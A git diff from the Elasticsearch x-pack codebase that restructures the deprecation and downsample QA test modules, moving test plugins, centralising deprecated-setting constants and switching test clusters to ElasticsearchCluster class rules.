diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java similarity index 95% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java index 205a699d23593..c486d1d3a8457 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecatedQueryBuilder.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecatedQueryBuilder.java @@ -5,11 +5,10 @@ * 2.0. */ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -92,6 +91,6 @@ protected boolean doEquals(TestDeprecatedQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java similarity index 79% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java index 2b9d9b0875220..797a9fbb8a238 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationHeaderRestAction.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationHeaderRestAction.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.elasticsearch.client.internal.node.NodeClient; import org.elasticsearch.common.logging.DeprecationCategory; @@ -26,6 +26,14 @@ import static org.elasticsearch.rest.RestRequest.Method.GET; import static org.elasticsearch.rest.RestRequest.Method.POST; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.COMPATIBLE_API_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_ENDPOINT; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_WARN_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE3; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; /** * Enables testing {@code DeprecationRestHandler} via integration tests by guaranteeing a deprecated REST endpoint. @@ -36,34 +44,6 @@ public class TestDeprecationHeaderRestAction extends BaseRestHandler { private static final DeprecationLogger deprecationLogger = DeprecationLogger.getLogger(TestDeprecationHeaderRestAction.class); - public static final Setting TEST_DEPRECATED_SETTING_TRUE1 = Setting.boolSetting( - "test.setting.deprecated.true1", - true, - Setting.Property.NodeScope, - Setting.Property.DeprecatedWarning, - Setting.Property.Dynamic - ); - public static final Setting TEST_DEPRECATED_SETTING_TRUE2 = Setting.boolSetting( - "test.setting.deprecated.true2", - true, - Setting.Property.NodeScope, - Setting.Property.DeprecatedWarning, - Setting.Property.Dynamic - ); - public static final Setting TEST_DEPRECATED_SETTING_TRUE3 = Setting.boolSetting( - "test.setting.deprecated.true3", - true, - Setting.Property.NodeScope, - Setting.Property.Deprecated, - Setting.Property.Dynamic - ); - public static final Setting TEST_NOT_DEPRECATED_SETTING = Setting.boolSetting( - "test.setting.not_deprecated", - false, - Setting.Property.NodeScope, - Setting.Property.Dynamic - ); - private static final Map> SETTINGS_MAP = Map.of( TEST_DEPRECATED_SETTING_TRUE1.getKey(), TEST_DEPRECATED_SETTING_TRUE1, @@ -75,12 +55,6 @@ public class TestDeprecationHeaderRestAction extends BaseRestHandler { TEST_NOT_DEPRECATED_SETTING ); - public static final String DEPRECATED_ENDPOINT = "[/_test_cluster/deprecated_settings] exists for deprecated tests"; - public static final String DEPRECATED_USAGE = "[deprecated_settings] usage is deprecated. use [settings] instead"; - public static final String DEPRECATED_WARN_USAGE = - "[deprecated_warn_settings] usage is deprecated but won't be breaking in next version"; - public static final String COMPATIBLE_API_USAGE = "You are using a compatible API for this request"; - private final Settings settings; public TestDeprecationHeaderRestAction(Settings settings) { diff --git a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java similarity index 82% rename from x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java rename to x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java index 3867e02ac6ca7..ca8119268dbc5 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/main/java/org/elasticsearch/xpack/deprecation/TestDeprecationPlugin.java +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/plugin/TestDeprecationPlugin.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.plugin; import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver; import org.elasticsearch.cluster.node.DiscoveryNodes; @@ -28,6 +28,9 @@ import java.util.function.Supplier; import static java.util.Collections.singletonList; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; /** * Adds {@link TestDeprecationHeaderRestAction} for testing deprecation requests via HTTP. @@ -51,11 +54,7 @@ public List getRestHandlers( @Override public List> getSettings() { - return Arrays.asList( - TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE1, - TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE2, - TestDeprecationHeaderRestAction.TEST_NOT_DEPRECATED_SETTING - ); + return Arrays.asList(TEST_DEPRECATED_SETTING_TRUE1, TEST_DEPRECATED_SETTING_TRUE2, TEST_NOT_DEPRECATED_SETTING); } @Override diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle new file mode 100644 index 0000000000000..e1faa524b7f34 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/build.gradle @@ -0,0 +1,22 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +apply plugin: 'elasticsearch.base-internal-es-plugin' +apply plugin: 'elasticsearch.build' + +esplugin { + name = 'early-deprecation-plugin' + description = 'Deprecated query plugin' + classname = 'org.elasticsearch.xpack.deprecation.earlyplugin.EarlyDeprecationTestPlugin' +} + +dependencies { + compileOnly project(":server") +} +tasks.named("javadoc").configure { + enabled = false +} diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java similarity index 94% rename from x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java rename to x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java index e8c04ab68c901..3e189ed1e379f 100644 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/main/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationTestPlugin.java +++ b/x-pack/plugin/deprecation/qa/early-deprecation-plugin/src/main/java/org/elasticsearch/xpack/deprecation/earlyplugin/EarlyDeprecationTestPlugin.java @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.deprecation; +package org.elasticsearch.xpack.deprecation.earlyplugin; import org.elasticsearch.common.logging.DeprecationCategory; import org.elasticsearch.common.logging.DeprecationLogger; diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle b/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle deleted file mode 100644 index 2fe46efca8a1c..0000000000000 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/build.gradle +++ /dev/null @@ -1,48 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import org.elasticsearch.gradle.util.GradleUtils - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.legacy-java-rest-test' - -esplugin { - description = 'Deprecated query plugin' - classname ='org.elasticsearch.xpack.deprecation.EarlyDeprecationTestPlugin' -} - -dependencies { - javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') - - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") -} - -// let the javaRestTest see the classpath of main -GradleUtils.extendSourceSet(project, "main", "javaRestTest", tasks.named("javaRestTest")) - -restResources { - restApi { - include '_common', 'indices', 'index' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.security.enabled', 'false' - setting 'xpack.license.self_generated.type', 'trial' - setting 'cluster.deprecation_indexing.enabled', 'true' - setting 'cluster.deprecation_indexing.flush_interval', '1ms' - setting 'logger.org.elasticsearch.xpack.deprecation','TRACE' - setting 'logger.org.elasticsearch.xpack.deprecation.logging','TRACE' -} - -// Test clusters run with security disabled -tasks.named("javaRestTest") { - buildParams.withFipsEnabledOnly(it) -} - diff --git a/x-pack/plugin/deprecation/qa/rest/build.gradle b/x-pack/plugin/deprecation/qa/rest/build.gradle deleted file mode 100644 index e3ad5799aaf75..0000000000000 --- a/x-pack/plugin/deprecation/qa/rest/build.gradle +++ /dev/null @@ -1,44 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import org.elasticsearch.gradle.util.GradleUtils - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.legacy-java-rest-test' - -esplugin { - description = 'Deprecated query plugin' - classname ='org.elasticsearch.xpack.deprecation.TestDeprecationPlugin' -} - -dependencies { - javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") - javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") -} - -// let the javaRestTest see the classpath of main -GradleUtils.extendSourceSet(project, "main", "javaRestTest", tasks.named("javaRestTest")) - -restResources { - restApi { - include '_common', 'indices', 'index' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'cluster.deprecation_indexing.enabled', 'true' - setting 'cluster.deprecation_indexing.flush_interval', '100ms' - setting 'xpack.security.enabled', 'false' - setting 'xpack.license.self_generated.type', 'trial' -} - -// Test clusters run with security disabled -tasks.named("javaRestTest") { - buildParams.withFipsEnabledOnly(it) -} diff --git a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java similarity index 95% rename from x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java index 57bda3b35a1ad..df17c779a15df 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java +++ b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/DeprecationHttpIT.java @@ -25,11 +25,13 @@ import org.elasticsearch.common.settings.Setting; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.RestApiVersion; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.json.JsonXContent; import org.hamcrest.Matcher; import org.junit.Before; +import org.junit.ClassRule; import org.junit.Rule; import org.junit.rules.TestName; @@ -44,9 +46,13 @@ import static org.elasticsearch.common.logging.DeprecatedMessage.KEY_FIELD_NAME; import static org.elasticsearch.common.logging.DeprecatedMessage.X_OPAQUE_ID_FIELD_NAME; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE1; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE2; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_NOT_DEPRECATED_SETTING; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.COMPATIBLE_API_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_ENDPOINT; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE3; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.containsString; @@ -62,6 +68,25 @@ */ public class DeprecationHttpIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("ingest-common") + .module("constant-keyword") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "100ms") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Rule public TestName testName = new TestName(); @@ -233,9 +258,9 @@ private void doTestDeprecationWarningsAppearInHeaders(String xOpaqueId) throws E final List deprecatedWarnings = getWarningHeaders(response.getHeaders()); final List> headerMatchers = new ArrayList<>(4); - headerMatchers.add(equalTo(TestDeprecationHeaderRestAction.DEPRECATED_ENDPOINT)); + headerMatchers.add(equalTo(DEPRECATED_ENDPOINT)); if (useDeprecatedField) { - headerMatchers.add(equalTo(TestDeprecationHeaderRestAction.DEPRECATED_USAGE)); + headerMatchers.add(equalTo(DEPRECATED_USAGE)); } assertThat(deprecatedWarnings, everyItem(matchesRegex(HeaderWarning.WARNING_HEADER_PATTERN))); @@ -379,12 +404,7 @@ public void testDeprecationMessagesCanBeIndexed() throws Exception { */ public void testDeprecationCriticalWarnMessagesCanBeIndexed() throws Exception { final Request request = new Request("GET", "/_test_cluster/only_deprecated_setting"); - request.setEntity( - buildSettingsRequest( - Collections.singletonList(TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE3), - "deprecation_critical" - ) - ); + request.setEntity(buildSettingsRequest(Collections.singletonList(TEST_DEPRECATED_SETTING_TRUE3), "deprecation_critical")); performScopedRequest(request); assertBusy(() -> { @@ -601,7 +621,7 @@ public void testCompatibleMessagesCanBeIndexed() throws Exception { final List deprecatedWarnings = getWarningHeaders(deprecatedApiResponse.getHeaders()); assertThat( extractWarningValuesFromWarningHeaders(deprecatedWarnings), - containsInAnyOrder(TestDeprecationHeaderRestAction.DEPRECATED_ENDPOINT, TestDeprecationHeaderRestAction.COMPATIBLE_API_USAGE) + containsInAnyOrder(DEPRECATED_ENDPOINT, COMPATIBLE_API_USAGE) ); assertBusy(() -> { diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java similarity index 80% rename from x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java index 798730970d9d3..b5a42d27bc6b1 100644 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java +++ b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java @@ -15,7 +15,9 @@ import org.elasticsearch.client.RestClient; import org.elasticsearch.client.RestClientBuilder; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; +import org.junit.ClassRule; import java.io.IOException; import java.util.List; @@ -35,6 +37,28 @@ */ public class EarlyDeprecationIndexingIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("early-deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("ingest-common") + .module("constant-keyword") + .module("data-streams") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "1ms") + .setting("logger.org.elasticsearch.xpack.deprecation", "TRACE") + .setting("logger.org.elasticsearch.xpack.deprecation.logging", "TRACE") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + /** * In EarlyDeprecationTestPlugin#onNodeStarted we simulate a very early deprecation that can happen before the template is loaded * The indexing has to be delayed until templates are loaded. diff --git a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java similarity index 82% rename from x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java index 54a48ab34e991..4ee5f39e8df55 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java +++ b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java @@ -13,9 +13,11 @@ import org.elasticsearch.client.WarningsHandler; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.search.SearchModule; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.NamedXContentRegistry; import org.junit.After; +import org.junit.ClassRule; import java.io.IOException; import java.util.Collections; @@ -28,6 +30,29 @@ public class MlDeprecationIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("x-pack-ml") + .module("mapper-extras") + .module("wildcard") + .module("ingest-common") + .module("constant-keyword") + .module("transform") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "100ms") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + private static final RequestOptions REQUEST_OPTIONS = RequestOptions.DEFAULT.toBuilder() .setWarningsHandler(WarningsHandler.PERMISSIVE) .build(); diff --git a/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java b/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java index 6f1853eaeed68..bf314d405f139 100644 --- a/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java +++ b/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java @@ -78,7 +78,7 @@ public void testOldIndicesCheck() { public void testOldIndicesCheckWithOnlyNewIndices() { // This tests what happens when any old indices that we have are closed. We expect no deprecation warning. - int newOpenIndexCount = randomIntBetween(0, 100); + int newOpenIndexCount = randomIntBetween(1, 100); int newClosedIndexCount = randomIntBetween(0, 100); Map nameToIndexMetadata = new HashMap<>(); diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java index 6794bc47fa3cd..dfef469a27812 100644 --- a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java @@ -35,7 +35,7 @@ public DownsampleRestIT(final ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample" }); } } diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java index 8f75e76315844..d9a44ab1508d6 100644 --- a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java @@ -34,7 +34,7 @@ public DownsampleWithBasicRestIT(final ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample" }); } } diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java new file mode 100644 index 0000000000000..afde47b377400 --- /dev/null +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java @@ -0,0 +1,53 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.downsample; + +import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; + +import org.elasticsearch.common.settings.SecureString; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.concurrent.ThreadContext; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.distribution.DistributionType; +import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; +import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; +import org.junit.ClassRule; + +public class DownsampleWithSecurityRestIT extends ESClientYamlSuiteTestCase { + + public static final String USERNAME = "elastic_admin"; + public static final String PASSWORD = "admin-password"; + + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .distribution(DistributionType.DEFAULT) + .setting("xpack.license.self_generated.type", "trial") + .setting("xpack.security.enabled", "true") + .user(USERNAME, PASSWORD) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + + public DownsampleWithSecurityRestIT(final ClientYamlTestCandidate testCandidate) { + super(testCandidate); + } + + @Override + protected Settings restClientSettings() { + String authentication = basicAuthHeaderValue(USERNAME, new SecureString(PASSWORD.toCharArray())); + return Settings.builder().put(super.restClientSettings()).put(ThreadContext.PREFIX + ".Authorization", authentication).build(); + } + + @ParametersFactory + public static Iterable parameters() throws Exception { + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample-with-security" }); + } +} diff --git a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/resources/rest-api-spec/test/downsample/10_basic.yml b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/downsample-with-security/10_basic.yml similarity index 100% rename from x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/resources/rest-api-spec/test/downsample/10_basic.yml rename to x-pack/plugin/downsample/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/downsample-with-security/10_basic.yml diff --git a/x-pack/plugin/downsample/qa/with-security/build.gradle b/x-pack/plugin/downsample/qa/with-security/build.gradle deleted file mode 100644 index 29980b95d0291..0000000000000 --- a/x-pack/plugin/downsample/qa/with-security/build.gradle +++ /dev/null @@ -1,33 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import org.elasticsearch.gradle.Version - -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -dependencies { - yamlRestTestImplementation project(path: xpackModule('rollup')) -} - -restResources { - restApi { - include '_common', 'bulk', 'cluster', 'indices', 'search', 'ingest.put_pipeline', 'ingest.delete_pipeline' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.license.self_generated.type', 'trial' - setting 'xpack.security.enabled', 'true' - user username: 'elastic_admin', password: 'admin-password' -} - -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("yamlRestTest").configure{enabled = false } -} diff --git a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java b/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java deleted file mode 100644 index 7bdbd5e6b0937..0000000000000 --- a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package org.elasticsearch.xpack.downsample; - -import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; - -import org.elasticsearch.common.settings.SecureString; -import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; -import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; - -public class DownsampleRestIT extends ESClientYamlSuiteTestCase { - - public DownsampleRestIT(final ClientYamlTestCandidate testCandidate) { - super(testCandidate); - } - - @Override - protected Settings restClientSettings() { - String authentication = basicAuthHeaderValue("elastic_admin", new SecureString("admin-password".toCharArray())); - return Settings.builder().put(super.restClientSettings()).put(ThreadContext.PREFIX + ".Authorization", authentication).build(); - } - - @ParametersFactory - public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); - } - -} diff --git 